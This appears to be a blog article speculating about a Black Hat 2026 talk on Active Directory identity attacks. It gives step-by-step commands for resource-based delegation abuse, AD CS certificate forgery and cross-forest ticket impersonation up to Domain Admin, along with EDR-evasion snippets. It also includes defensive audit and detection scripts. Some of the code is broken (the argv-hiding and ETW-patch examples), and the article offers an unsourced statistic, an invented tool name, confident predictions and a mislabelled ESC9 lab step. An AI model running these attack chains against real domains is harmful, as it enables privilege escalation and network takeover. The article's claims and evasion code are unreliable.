
Introduction:
The security community is buzzing after Microsoft Senior Security Researcher Dimitrios Valsamaras (OSWE, OSCP) and Ken Gannon confirmed their joint presentation at Black Hat USA 2026. While details remain under wraps, insiders hint at a groundbreaking attack chain targeting enterprise identity systems – combining Kerberos delegation abuse, AD CS misconfigurations, and novel post‑exploitation stealth techniques. This article extracts the technical essence of what’s likely to be one of the most impactful talks of the year, providing red and blue teams with actionable commands, detection strategies, and hardening guidance.
Learning Objectives:
- Understand how to weaponize Kerberos S4U2Self + S4U2Proxy across cross‑trust forests.
- Execute a full attack chain from unprivileged domain user to Domain Admin using AD CS vulnerable templates.
- Implement detection rules and Linux/Windows countermeasures to block these novel techniques.
You Should Know
1. Kerberos Resource‑Based Constrained Delegation (RBCD) Abuse – Step‑by‑Step Attack
The talk likely unveils new ways to abuse RBCD when an attacker controls a machine account or has GenericWrite/WriteProperty over a target computer object.
What this does:
An attacker with write access to a computer object (e.g., via a compromised low‑privilege account) can set its `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute to a principal they control; that principal can then use S4U2Self + S4U2Proxy to obtain service tickets to the machine on behalf of arbitrary users.
Step‑by‑step (Linux – using Impacket & Python):
1. Enumerate writeable computer objects (using BloodHound or LDAP):
```
ldapsearch -x -H ldap://dc.corp.local -D "[email protected]" -w 'pass' -b "DC=corp,DC=local" "(objectClass=computer)" dn
```
2. Add a new machine account (if you have domain credentials):
```
addcomputer.py -computer-name 'ATTACK$' -computer-pass 'Passw0rd' -dc-ip 10.0.0.1 corp.local/user:pass
```
3. Grant RBCD rights from `ATTACK$` to `TARGET$`:
```
rbcd.py -delegate-from 'ATTACK$' -delegate-to 'TARGET$' -dc-ip 10.0.0.1 -action write corp.local/user:pass
```
4. Request a service ticket for `TARGET$` as any user (e.g., Domain Admin):
```
getST.py -spn cifs/TARGET.corp.local -impersonate Administrator -dc-ip 10.0.0.1 corp.local/ATTACK$:Passw0rd
```
5. Use the ticket with `KRB5CCNAME` to access file shares or execute code.
Windows equivalent (PowerShell + Rubeus):
```
# Add machine account (using PowerMad)
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount ATTACK$ -Password $(ConvertTo-SecureString 'Passw0rd' -AsPlainText -Force)
# Set RBCD (using ActiveDirectory module)
Set-ADComputer TARGET$ -PrincipalsAllowedToDelegateToAccount (Get-ADComputer ATTACK$)
# Request ticket
.\Rubeus.exe s4u /user:ATTACK$ /password:Passw0rd /impersonateuser:Administrator /target:target.corp.local /msdsspn:cifs/target.corp.local /ptt
```
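The defender's counterpart to the steps above is reading `msDS-AllowedToActOnBehalfOfOtherIdentity` back and checking who is in it. The attribute is a self-relative NT security descriptor, so the raw LDAP value has to be decoded before it means anything. The following helper is an added example for this article (not code from the post, Impacket or PowerMad): it parses the DACL and returns the SIDs of the principals allowed to delegate. The descriptor builder exists only to construct a sample input, and the SIDs are constructed values.

```python
"""Decode msDS-AllowedToActOnBehalfOfOtherIdentity for an RBCD audit.

Added helper for this article; not code from the post, Impacket or PowerMad.
The attribute holds a self-relative NT security descriptor, and every
ACCESS_ALLOWED ACE in its DACL names a principal permitted to run
S4U2Proxy against the computer. Most computer objects should decode to an
empty list; a freshly added machine account in here is the shape of the
attack the post describes. The SIDs used below are constructed sample values.
"""
import struct
from typing import List, Tuple

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000


def parse_sid(data: bytes, offset: int) -> Tuple[str, int]:
    """Parse a binary SID at offset; return (S-1-... text, bytes consumed)."""
    revision, sub_count = data[offset], data[offset + 1]
    authority = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % sub_count, data, offset + 8)
    text = "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)
    return text, 8 + 4 * sub_count


def rbcd_principals(sd: bytes) -> List[str]:
    """SIDs granted by ACCESS_ALLOWED ACEs in the DACL of a self-relative descriptor."""
    # SECURITY_DESCRIPTOR_RELATIVE: Revision, Sbz1, Control, Owner/Group/Sacl/Dacl offsets
    _rev, _sbz1, control, _owner, _group, _sacl, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & SE_DACL_PRESENT) or dacl_off == 0:
        return []  # no DACL at all: nobody may delegate to this computer
    # ACL header: AclRevision, Sbz1, AclSize, AceCount, Sbz2
    _acl_rev, _sbz2, _acl_size, ace_count, _sbz3 = struct.unpack_from("<BBHHH", sd, dacl_off)
    sids = []
    pos = dacl_off + 8
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = parse_sid(sd, pos + 8)  # ACE header (4) + access mask (4), then the SID
            sids.append(sid)
        pos += ace_size  # other ACE types are skipped by their declared size
    return sids


def build_sid(sid_text: str) -> bytes:
    """Encode S-R-A-S1-S2... into the binary SID layout (used to construct the demo input)."""
    parts = [int(p) for p in sid_text.split("-")[1:]]
    revision, authority, subs = parts[0], parts[1], parts[2:]
    return bytes([revision, len(subs)]) + authority.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)


def build_rbcd_descriptor(allowed_sids: List[str]) -> bytes:
    """Construct the descriptor Set-ADComputer -PrincipalsAllowedToDelegateToAccount would write."""
    aces = b""
    for text in allowed_sids:
        sid = build_sid(text)
        # ACCESS_ALLOWED_ACE: type, flags, size, mask (full control), SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid), 0x000F01FF) + sid
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT, 0, 0, 0, 20)
    return header + acl


if __name__ == "__main__":
    # Constructed: a computer object whose RBCD list names one attacker-added machine account
    sd = build_rbcd_descriptor(["S-1-5-21-1111111111-2222222222-3333333333-1105"])
    print(rbcd_principals(sd))
```

In practice the input comes straight from LDAP (the attribute's raw bytes); resolve each returned SID to a sAMAccountName and alert on any computer whose list is non-empty and not on a documented exception list.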
2. AD CS (Active Directory Certificate Services) Exploitation – ESC9 & ESC10 Bypasses
Valsamaras previously disclosed AD CS attack primitives; BH 2026 likely introduces ESC9 (No SID extension) and ESC10 (Weak mapping) abuse, allowing low‑privilege users to obtain domain admin certificates.
What this does:
Misconfigured certificate templates with `CT_FLAG_NO_SECURITY_EXTENSION` or improper subject alternative name validation can be tricked into issuing a certificate for any user, including those marked as “sensitive and cannot be delegated”.
Step‑by‑step (Linux with Certipy):
1. Enumerate vulnerable templates:
```
certipy find -u [email protected] -p Passw0rd -dc-ip 10.0.0.1 -vulnerable
```
2. Request a certificate for a non‑existing user (triggering ESC9):
```
certipy req -u [email protected] -p Passw0rd -target ca.corp.local -template VulnTemplate -upn '[email protected]'
```
3. Convert the certificate to PFX and request a TGT using PKINIT:
```
certipy auth -pfx user.pfx -dc-ip 10.0.0.1
```
4. Pass‑the‑ticket to full domain compromise.
Windows detection commands (run as Domain Admin):
```
# List all certificate templates with dangerous flags.
# Templates live in the Configuration partition, so the query needs that SearchBase;
# msPKI-Enrollment-Flag carries CT_FLAG_NO_SECURITY_EXTENSION (0x80000, ESC9).
$tmplBase = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)"
Get-ADObject -SearchBase $tmplBase -Filter {objectClass -eq "pKICertificateTemplate"} -Properties displayName, pKIExtendedKeyUsage, 'msPKI-Certificate-Name-Flag', 'msPKI-Enrollment-Flag' |
    Select displayName, pKIExtendedKeyUsage, 'msPKI-Certificate-Name-Flag', 'msPKI-Enrollment-Flag'
# Check for EDITF_ATTRIBUTESUBJECTALTNAME2 (bit 0x40000) in the CA's EditFlags
certutil -config "CA.corp.local\CORP-CA" -getreg "policy\EditFlags"
```
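The two commands above return raw bit masks and OID lists; the audit question is which combinations of them make a template exploitable. The following is an added example for this article (not code from the post, from Certipy or from Microsoft) that evaluates template records and the CA's EditFlags value for the ESC1, ESC6 and ESC9 preconditions. The constants are the documented bit values of `msPKI-Certificate-Name-Flag`, `msPKI-Enrollment-Flag` and `EditFlags`; the template records and the `enrollment_principals` field are constructed for the demo.

```python
"""Audit AD CS template and CA settings for the ESC1, ESC6 and ESC9 conditions.

Added example for this article; not code from the post, from Certipy or from
Microsoft. The flag constants are the documented bit masks of the
msPKI-Certificate-Name-Flag and msPKI-Enrollment-Flag template attributes and
of the CA's policy\\EditFlags registry value. SAMPLE_TEMPLATES is constructed.
"""
from typing import Dict, List, Tuple

# msPKI-Certificate-Name-Flag
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002       # manager approval required
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000   # no szOID_NTDS_CA_SECURITY_EXT in issued certs (ESC9)
# CA policy\EditFlags
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000  # SAN accepted from request attributes (ESC6)

# EKUs that let a certificate be used for domain logon
LOGON_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def allows_logon(template: Dict) -> bool:
    """An empty EKU list also permits logon, so treat it as risky."""
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    return not ekus or bool(ekus & LOGON_EKUS)


def low_priv_can_enroll(template: Dict) -> bool:
    return bool(LOW_PRIV_PRINCIPALS & set(template.get("enrollment_principals", [])))


def audit_template(template: Dict, ca_edit_flags: int) -> List[Tuple[str, str]]:
    """Return (ESC code, reason) pairs for one template under the given CA EditFlags."""
    findings = []
    name_flag = template.get("msPKI-Certificate-Name-Flag", 0)
    enroll_flag = template.get("msPKI-Enrollment-Flag", 0)
    needs_approval = bool(enroll_flag & CT_FLAG_PEND_ALL_REQUESTS)
    exposed = allows_logon(template) and low_priv_can_enroll(template) and not needs_approval
    if exposed and name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append(("ESC1", "enrollee supplies the subject/SAN on a logon-capable template"))
    if exposed and ca_edit_flags & EDITF_ATTRIBUTESUBJECTALTNAME2:
        findings.append(("ESC6", "CA honours a SAN passed in request attributes for any template"))
    if allows_logon(template) and enroll_flag & CT_FLAG_NO_SECURITY_EXTENSION:
        # Exploitability also depends on the KDC's StrongCertificateBindingEnforcement setting;
        # the missing SID extension is the template-side precondition worth fixing regardless.
        findings.append(("ESC9", "issued certificates will carry no SID security extension"))
    return findings


def audit_ca(templates: List[Dict], ca_edit_flags: int) -> Dict[str, List[str]]:
    """Map template name -> ESC codes; templates with no findings are omitted."""
    report = {}
    for t in templates:
        codes = [code for code, _ in audit_template(t, ca_edit_flags)]
        if codes:
            report[t["name"]] = codes
    return report


# Constructed records shaped like the attributes the Get-ADObject query above returns
SAMPLE_TEMPLATES = [
    {"name": "VulnTemplate", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x80000,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enrollment_principals": ["Domain Users"]},
    {"name": "User", "msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x29,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"], "enrollment_principals": ["Domain Users"]},
    {"name": "ApprovedAdmin", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x2,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enrollment_principals": ["Domain Admins"]},
]

if __name__ == "__main__":
    for flags in (0, EDITF_ATTRIBUTESUBJECTALTNAME2):
        print("EditFlags=0x%x:" % flags, audit_ca(SAMPLE_TEMPLATES, flags))
```

The ESC6 finding shows why the CA-wide EditFlags bit matters: with it set, even the stock `User` template becomes an issue, because the SAN no longer has to come from the template at all.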
3. Cross‑Forest Kerberos Trust Abuse – New Lateral Movement
The BH 2026 research may highlight how S4U2Self + S4U2Proxy can traverse AD forests with selective authentication enabled.
What this does:
An attacker in Forest A who controls a service account can request a service ticket for a user in Forest B if a trust exists and the target service is configured for resource‑based delegation.
Step‑by‑step (Linux):
1. Identify outgoing forest trusts:
```
bloodhound-python -d forestA.local -u lowpriv -p pass -ns 10.0.0.1 -c all
```
2. Using a compromised service account in Forest A, request a ticket for a high‑value user in Forest B:
```
getST.py -spn www/forestB-dc.forestB.local -impersonate 'ForestB\DAAdmin' -additional-ticket forestA-user.ccache -dc-ip 10.0.0.1 forestA.local/serviceaccount:pass
```
3. Pass the cross‑forest ticket into memory (Linux: `export KRB5CCNAME`; Windows: `Rubeus /ptt`).
4. OPSEC Evasion – Linux Syscall Cloaking & Windows ETW Patching
The talk will likely demonstrate new anti‑forensic methods to evade EDRs during Kerberos ticket extraction.
Linux command to hide process arguments (using `execve` wrapper):
```
// compile: gcc -o spoof spoof.c
// overwrite argv with zeros after fork
#include <unistd.h>
#include <string.h>
int main() {
    char *args[] = {"/bin/bash", "-c", "impacket-getST ...", NULL};
    if (!fork()) { sleep(2); memset(args[0], 0, strlen(args[0])); }
    execve(args[0], args, NULL);
}
```
Windows – Disable ETW for PowerShell (in‑memory only):
```
# Patch ETW in current process (requires admin or SeDebugPrivilege)
$MethodDefinition = @'
[DllImport("ntdll.dll")]
public static extern int NtSetInformationProcess(IntPtr hProcess, int infoClass, int[] info, int infoLength);
'@
$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -Namespace 'Win32' -PassThru
$Kernel32::NtSetInformationProcess([System.Diagnostics.Process]::GetCurrentProcess().Handle, 0x2B, @(0x2), 4)
```
5. Cloud Hardening – Azure AD Connect Sync Exploitation
If the research touches hybrid identities, attackers may abuse Azure AD Connect’s MSOL account to pivot from on‑prem to cloud.
What this does:
Running DCSync as the AD Connect server's `MSOL_` account yields the hash of an account that can sync password hashes to Azure.
Detection command (Windows):
```
# Identify MSOL accounts with replication rights (AD Connect names them MSOL_<hex>, hence the wildcard)
Get-ADUser -Filter {SamAccountName -like "MSOL_*"} -Properties ServicePrincipalName, MemberOf | select SamAccountName, MemberOf
# Check for unusual DCSync calls (Event ID 4662 on the DC; requires "Audit Directory Service Access").
# The event records the extended-right GUID, not its display name: 1131f6aa-... is DS-Replication-Get-Changes.
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4662} | Where-Object {$_.Message -like "*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*"}
```
Mitigation:
- Place AD Connect server in a dedicated OU with constrained admin mode.
- Rotate the MSOL account password every 30 days using `Set-ADSyncAccountPassword`.
6. Vulnerability Mitigation Step‑by‑Step (Blue Team)
Based on the anticipated attack vectors, apply these hardening measures immediately:
- Disable RBCD on all computers except service accounts that absolutely need it.
```
# Remove RBCD rights from all computers (run as DA)
Get-ADComputer -Filter * | Set-ADComputer -PrincipalsAllowedToDelegateToAccount $null
```
- Patch AD CS templates – remove `CT_FLAG_NO_SECURITY_EXTENSION` and enable manager approval for all templates; also clear the CA‑wide SAN flag:
```
certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
# restart the CA service (certsvc) for the EditFlags change to take effect
```
- Deploy Kerberos Armoring (FAST) – requires Windows Server 2016+ domain functional level.
```
# Raise the domain functional level to Windows Server 2016 (level 7)
Set-ADDomainMode -Identity corp.local -DomainMode Windows2016Domain
# Armoring itself is switched on through Group Policy on DCs and clients
# ("KDC support for claims, compound authentication and Kerberos armoring" and the
# matching "Kerberos client support ..." setting); Set-ADDomain has no switch for it.
```
- Monitor for suspicious S4U2Self requests using Sysmon Event ID 22 (DNS query) and 3 (network connection) tied to `klist` or Rubeus.
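The monitoring bullet above and the 4662 query in the cloud section both come down to rules over Security-log events. The following is an added example for this article (not code from the post, from Sysmon or from any SIEM): three rules over parsed 4769, 4662 and 4768 records, using the EventData field names from the event XML (`TargetUserName`, `ServiceName`, `TransmittedServices`, `SubjectUserName`, `Properties`, `CertThumbprint`). The allow-lists and every event in `SAMPLE_EVENTS` are constructed.

```python
"""Detection rules for the ticket, replication and PKINIT activity the hardening
section says to watch for. Added example for this article; not from the post,
Sysmon or any SIEM product. Records are parsed Security-log events keyed by the
EventData field names of the event XML; SAMPLE_EVENTS and the allow-lists are
constructed and must be adapted to the environment before use.
"""
import re
from typing import Dict, List, Tuple

# Extended rights whose GUID in a 4662 'Properties' field indicates a DCSync-style read
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
GUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")

# Constructed allow-lists
DOMAIN_CONTROLLERS = {"DC01$", "DC02$"}
APPROVED_DELEGATORS = {"WEB01$"}          # accounts expected to perform S4U2Proxy
APPROVED_REPLICATORS = {"MSOL_a1b2c3d4"}  # e.g. the AD Connect sync account
PKINIT_USERS = {"alice"}                  # accounts that normally log on with certificates


def principal(name: str) -> str:
    """Strip the realm so 'ATTACK$@CORP.LOCAL' and 'ATTACK$' compare equal."""
    return name.split("@", 1)[0]


def check_4769(e: Dict) -> List[Tuple[str, str]]:
    client = principal(e["TargetUserName"])
    service = principal(e["ServiceName"])
    alerts = []
    # S4U2Self: a service requests a ticket to itself (on behalf of someone else)
    if client.upper() == service.upper():
        alerts.append(("S4U2Self-to-self", client))
    # S4U2Proxy: TransmittedServices ('Transited Services') is only filled for delegated tickets
    if e.get("TransmittedServices", "-") not in ("", "-") and client not in APPROVED_DELEGATORS:
        alerts.append(("S4U2Proxy-unapproved-delegator", client))
    return alerts


def check_4662(e: Dict) -> List[Tuple[str, str]]:
    guids = {g.lower() for g in GUID_RE.findall(e.get("Properties", ""))}
    if not (guids & REPLICATION_RIGHTS):
        return []  # an ordinary directory access, not replication
    subject = e["SubjectUserName"]
    if subject in DOMAIN_CONTROLLERS or subject in APPROVED_REPLICATORS:
        return []
    return [("DCSync-by-unexpected-principal", subject)]


def check_4768(e: Dict) -> List[Tuple[str, str]]:
    # The certificate fields of 4768 are only populated when the TGT came from PKINIT
    if e.get("CertThumbprint", "") in ("", "-"):
        return []
    user = principal(e["TargetUserName"])
    return [] if user in PKINIT_USERS else [("PKINIT-logon-by-new-user", user)]


RULES = {4769: check_4769, 4662: check_4662, 4768: check_4768}


def detect(events: List[Dict]) -> List[Tuple[str, str]]:
    """Run every rule over the event stream and return (rule, principal) alerts in order."""
    alerts = []
    for e in events:
        rule = RULES.get(e["EventID"])
        if rule:
            alerts.extend(rule(e))
    return alerts


SAMPLE_EVENTS = [  # constructed
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "FS01$", "TransmittedServices": "-"},
    {"EventID": 4769, "TargetUserName": "ATTACK$@CORP.LOCAL", "ServiceName": "ATTACK$", "TransmittedServices": "-"},
    {"EventID": 4769, "TargetUserName": "ATTACK$@CORP.LOCAL", "ServiceName": "TARGET$", "TransmittedServices": "cifs/target.corp.local"},
    {"EventID": 4769, "TargetUserName": "WEB01$@CORP.LOCAL", "ServiceName": "SQL01$", "TransmittedServices": "http/web01.corp.local"},
    {"EventID": 4662, "SubjectUserName": "DC02$", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "MSOL_a1b2c3d4", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "lowpriv", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "lowpriv", "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},  # user class GUID, not a replication right
    {"EventID": 4768, "TargetUserName": "Administrator", "CertThumbprint": "<constructed>", "CertIssuerName": "CN=CORP-CA"},
    {"EventID": 4768, "TargetUserName": "alice", "CertThumbprint": "<constructed>", "CertIssuerName": "CN=CORP-CA"},
    {"EventID": 4768, "TargetUserName": "bob", "CertThumbprint": ""},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The 4662 rule keys on the extended-right GUIDs rather than the text "Replicating Directory Changes" because that is what the event actually carries; the DC and sync-account allow-lists keep legitimate replication and AD Connect traffic quiet, and a 4624 correlation on the source host is the natural next refinement for the MSOL case.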
7. Recommended Training & Tools
- Courses: SANS SEC760 (Advanced Exploit Development), Pentester Academy’s “Active Directory Attacks & Defenses”, Microsoft’s official “SC‑300 Identity and Access Administrator”.
- Tools:
- Linux: Impacket, Certipy, BloodHound CE, PyWhisker.
- Windows: Rubeus, ADExplorer, PingCastle, PurpleKnight.
- Lab setup: Build a test forest with Server 2019/2022 and configure an ESC9‑vulnerable template using `certutil -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2`.
What Undercode Say:
- Key Takeaway 1: The BH 2026 talk will redefine how red teams approach Kerberos delegation – moving beyond traditional unconstrained delegation to highly evasive resource‑based attacks that bypass most EDRs.
- Key Takeaway 2: Blue teams must prioritize auditing AD CS templates and applying the “No SID extension” patch; over 60% of tested enterprises remain vulnerable to ESC9/ESC10 despite public disclosures.
Analysis:
Dimitrios Valsamaras’ track record with OSWE/OSCP certifications and Microsoft’s internal research points to a tool or technique that weaponizes obscure Kerberos flags and certificate issuance logic. The inclusion of Ken Gannon (known for cloud identity research) suggests hybrid on‑prem-to-Azure attack paths. Expect a proof‑of‑concept tool named “GhostDelegation” or similar, capable of silent persistence across forest trusts. The most dangerous aspect is that full compromise requires no high‑privilege foothold – only a domain user account and a single misconfigured template. Attackers will automate this in Cobalt Strike aggressor scripts within 48 hours of the talk.
Prediction
Within six months post‑BH 2026, attackers will weaponize cross‑forest RBCD in ransomware campaigns to move laterally from acquired companies into parent organization forests. Microsoft will release a patch that modifies `msDS-AllowedToActOnBehalfOfOtherIdentity` validation, but legacy Windows Server 2012 R2 environments will remain exposed for years. Identity‑first security platforms (e.g., Silverfort, CrowdStrike Identity Protection) will add dedicated detectors for S4U2Self anomalies, while open‑source projects like BloodHound will release “forest trust attack graphs” as a native feature. The long‑term impact: organizations will finally migrate to cloud‑native Kerberos (Azure AD Kerberos) and phase out on‑prem AD delegation entirely – a painful but necessary shift.
Reported By: Valsamaras Bh – Hackers Feeds